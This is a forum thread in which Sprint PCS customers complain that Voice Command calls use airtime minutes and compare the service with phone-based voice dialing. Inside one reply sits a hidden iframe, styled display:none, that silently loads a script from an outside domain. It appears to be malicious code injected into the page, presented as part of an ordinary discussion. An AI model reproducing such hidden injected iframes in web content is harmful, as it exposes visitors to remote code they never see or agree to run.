Angry * Talk uses minutes!!

I just found out the hard way. When using Sprints Voice Command the *Talk actually dials an 800 number therefore using our airtime minutes. Which means if you fumble around on their system adding names, editing, looking up, it costs you money. Correct me if I'm wrong but if you manually dial and it is busy or just rings it does not count against your minutes until connected right. Well if you do this using voice command it does. Also, if you, like me have Sprint PCS to PCS minutes, you get dinged at least one minute off your anytime minutes (to connect to voice command) and then you get to dip into your PCS to PCS minutes.

Sorry for the long post, but I went over on my last bill because I just started using the voice command and I spent alot of time in the system trying it out. I was already at 1500 and went over by about 70 or so.

Other than the fact that it cost money, approximately 6-10 cents each time you use it during peak hours (depending on your plan) it is a great. It seems to get it right 90% of the time.

Sorry for the long post.

Thanks for the info GF. I had no idea that you are billed for minutes while using voice command. SPCS has a lot of clever ways to nickle and dime their customers.

Well, because you can actually "surf" using VC, it would make sense that you are charged.... <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

and you thought it was free? whenever you sign up for anything wirh sprint or anybody, please ask them any question you can think of... a lot of new folks to sprint will overlook obvious things and then they end up paying for it later..

i sympathize with you on the minutes used, especialy since its rounded to the nearest minute~!

FREE???

Don't think that anything is free. The only thing that is free is my first incoming minute. Yes, that's right, I have an old contract and I still get my first incoming minute with no charge

Voice Dial

Why on earth would anyone with hardware voice dial built-in to their i300 use the Sprint one?

I'm not trying to be rude here, I honestly would like to know if there are advantages...?

The i300 only supports 20 voice numbers. The Sprint service supports oodles and oodles more.

I've also heard (haven't used it, though) that you can dial any number with your voice using the sprint service.

All the info needed to persuade you is written in these pages my Huron friend. I'll post a link, but its $3.75 a month to have the convenience of caling anyone in your phonebook simply by speaking the command.

This is one of the threads devoted to the debate.

In what part of Ypsi do you live?

Voice COmmands

The Sprint voice commands have a couple advanges over the built voice dialing on the phone. If for some reason you have to do a master reset on your phone you lose all the built in voice dialing commands you set up. Hotsyning dosn't back them up.

With the Sprint Voice command, you can just say call 1800 555 1212 and it will call the number, You can do that with just the phone.

...and yu can sync the sprint VC to your desktop address book so you dont have to type in the numbers (as you used to do)..

you can also stoe enteirs by speaking them to the VC guy..

its tons better than the conventional in-phone voice dial..
